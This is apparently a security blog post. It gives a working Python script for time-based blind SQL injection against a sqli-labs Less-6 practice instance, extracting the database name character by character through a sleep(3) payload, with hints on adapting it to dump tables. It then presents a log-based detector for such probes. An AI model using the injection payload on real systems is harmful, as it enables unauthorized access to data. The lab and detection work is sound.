To learn without thinking is to be lost; to think without learning is to be in peril.
In several tests, SQL injection flaws that I had found by hand were ones sqlmap failed to detect, which was awkward, so I practised writing a blind injection script of my own; it will come in handy in future tests and when bypassing a WAF.
import time
import requests

# Candidate characters tried for each position of the database name
payloads = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_."
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"}
database = ""
url = "https://192.168.1.102/sqli-labs/Less-6/?id=1"
# Close the double-quoted string, then delay 3 seconds only when the guessed
# character matches; %23 is the URL-encoded '#' that comments out the rest
exp = '" and if(ascii(substr(database(),{0},1))={1},sleep(3),1) %23 '

for num in range(1, 10):
    for i in payloads:
        url_ = url + exp.format(num, ord(i))
        start_time = time.time()
        r = requests.get(url_, headers=headers)
        # A response slower than 2.5 s means sleep(3) fired, so the guess was right
        if time.time() - start_time > 2.5:
            database = database + i
            print(database)
            break  # character found, move on to the next position
Test results:
When dumping tables and columns you need to modify exp yourself.
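Seen from the defending side, a probe loop like the one above leaves a very recognisable trail in the web server's access log: the same client hits the same parameter over and over, each request carrying a delay primitive (sleep(), benchmark(), pg_sleep(), WAITFOR DELAY) wrapped in a conditional character test. The following detector is an added example written for this page, not code from the original post. It parses combined-format access-log lines, percent-decodes each query parameter repeatedly (so double-encoding does not hide the payload), flags values that contain a delay function or the if(ascii(substr(...))) probe shape, and then groups hits per (client IP, path, parameter) to surface the character-by-character enumeration pattern. The log lines, client IPs and timestamps are constructed for the demo; only the /sqli-labs/Less-6/ path is taken from the page.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access-log lines (combined log format) for the demo.
# Lines 2 and 3 mimic the shape of the time-based probe discussed above;
# line 4 is a benign request that happens to contain the word "sleep".
SAMPLE_LOG = """\
192.168.1.50 - - [10/Oct/2023:10:00:01 +0000] "GET /sqli-labs/Less-6/?id=1 HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.168.1.50 - - [10/Oct/2023:10:00:02 +0000] "GET /sqli-labs/Less-6/?id=1%22%20and%20if(ascii(substr(database(),1,1))=97,sleep(3),1)%20%23 HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.168.1.50 - - [10/Oct/2023:10:00:06 +0000] "GET /sqli-labs/Less-6/?id=1%22%20and%20if(ascii(substr(database(),1,1))=98,sleep(3),1)%20%23 HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.168.1.77 - - [10/Oct/2023:10:00:07 +0000] "GET /search?q=sleep%20training%20tips HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Indicator patterns, evaluated on the fully decoded, lower-cased value.
INDICATORS = {
    # Delay primitives of common engines (MySQL, PostgreSQL, MSSQL)
    "time_delay_function": re.compile(r'\b(sleep|pg_sleep|benchmark)\s*\(|waitfor\s+delay\b'),
    # Conditional single-character test used for bit-by-bit extraction
    "conditional_char_probe": re.compile(r'\bif\s*\(\s*ascii\s*\(\s*(substr|substring|mid)\s*\('),
    # Trailing SQL comment marker that truncates the rest of the statement
    "comment_truncation": re.compile(r'(#|--\s|/\*)\s*$'),
}
# Only these indicators are strong enough to raise an alert on their own;
# comment_truncation is reported as supporting evidence.
STRONG = {"time_delay_function", "conditional_char_probe"}


def decode_value(raw, rounds=3):
    """Percent-decode repeatedly so a double-encoded probe cannot slip past a
    single-pass filter; stop as soon as another round changes nothing."""
    value = raw
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_value(raw):
    """Return the names of all indicators matched by one parameter value."""
    value = decode_value(raw).lower().strip()
    return [name for name, rx in INDICATORS.items() if rx.search(value)]


def parse_line(line):
    """Split one combined-format log line into fields plus parsed query params."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def scan_log(text):
    """Return one alert per (request, parameter) carrying a strong indicator."""
    alerts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for param, values in rec["params"].items():
            for raw in values:
                hits = classify_value(raw)
                if STRONG.intersection(hits):
                    alerts.append({"ip": rec["ip"], "ts": rec["ts"], "path": rec["path"],
                                   "param": param, "indicators": hits})
    return alerts


def enumeration_sources(alerts, threshold=2):
    """Group alerts by (ip, path, param). Repeated probes against one parameter
    from one client are the signature of a character-by-character loop."""
    counts = Counter((a["ip"], a["path"], a["param"]) for a in alerts)
    return {key: n for key, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for a in found:
        print(f'{a["ts"]} {a["ip"]} {a["path"]} param={a["param"]} {a["indicators"]}')
    print("enumeration sources:", enumeration_sources(found))
```

Two design points: the alert threshold is intentionally per (client, path, parameter) rather than per request, because a single slow request is noise while a run of them against one parameter is the extraction loop itself; and the benign "sleep training tips" query is not flagged because the delay pattern requires the function-call parenthesis, which is the cheapest way to keep the word "sleep" out of the false-positive pile. Response latency is deliberately not used as a signal here, since the 3-second stall is only visible to the attacker's clock unless the server logs request duration.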